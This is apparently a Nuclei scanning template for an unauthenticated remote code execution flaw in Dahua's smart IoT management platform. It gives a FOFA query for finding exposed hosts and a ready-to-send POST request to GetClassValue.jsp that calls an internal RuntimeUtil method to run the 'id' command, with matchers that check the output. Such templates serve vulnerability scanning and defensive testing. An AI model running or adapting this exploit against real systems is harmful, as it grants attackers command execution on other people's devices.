id: dahua-GetClassValue_jsp-rce

info:
  name: 大华智能物联综合管理平台 GetClassValue.jsp 远程代码执行
  author: Superhero
  severity: high
  description: |-
    fofa: body="*客户端会小于800*"
    大华智能物联综合管理平台 GetClassValue.jsp 接口存在远程代码执行漏洞，未经身份验证的恶意攻击者可以利用该漏洞远程执行任意命令，获取系统权限。
  reference:
    - https://mp.weixin.qq.com/s/3vKaOwnXOG45eHNYs47HpA?token=968846615&lang=zh_CN
  tags: RCE


http:
  - raw:
      - |
        POST /evo-apigw/admin/API/Developer/GetClassValue.jsp HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
        Content-Type: application/json

        {
          "data": {
              "clazzName": "com.dahua.admin.util.RuntimeUtil",
              "methodName": "syncexecReturnInputStream",
              "fieldName": ["id"]
          }
        }

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"code":1000'
          - '"desc":"Success"'
          - 'uid='
          - 'gid='
        condition: and
      - type: status
        status: 
          - 200
